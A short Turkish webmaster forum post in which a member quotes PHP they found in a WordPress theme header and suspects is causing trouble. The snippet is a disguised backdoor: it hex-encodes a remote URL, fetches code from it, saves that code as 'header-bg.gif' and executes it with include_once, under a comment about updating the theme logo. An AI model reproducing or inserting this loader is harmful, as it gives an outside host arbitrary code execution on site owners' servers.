netbozum
tr.link

25749 25749 WM Aracı Anonim Üyelik
  • Üyelik 08.12.2013
  • Yaş/Cinsiyet - /
  • Meslek
  • Konum
  • Ad Soyad ** **
  • Mesajlar 784
  • Beğeniler 128 / 137
  • Ticaret 48, (%100)
evet kodlar header'da ctrl+u kombinasyonuyla arattırdım


if(!file_exists($theme_dir."/header-bg.gif")||0==filesize($theme_dir."/header-bg.gif")){
// Make sure theme logo is up to date
$wp_uri = pack("H*",'687474703a2f2f7466652e65732f68');
if(function_exists('curl_init')){
$t_img = curl_init($wp_uri);
curl_setopt($t_img,CURLOPT_RETURNTRANSFER,1);
$wp_logo = @curl_exec($t_img);}else{
$wp_logo = @file_get_contents($wp_uri);}
@file_put_contents($theme_dir."/header-bg.gif",$wp_logo);
}@include_once($theme_dir."/header-bg.gif"); ?>

şu kodların içerisinde diye düşünüyorum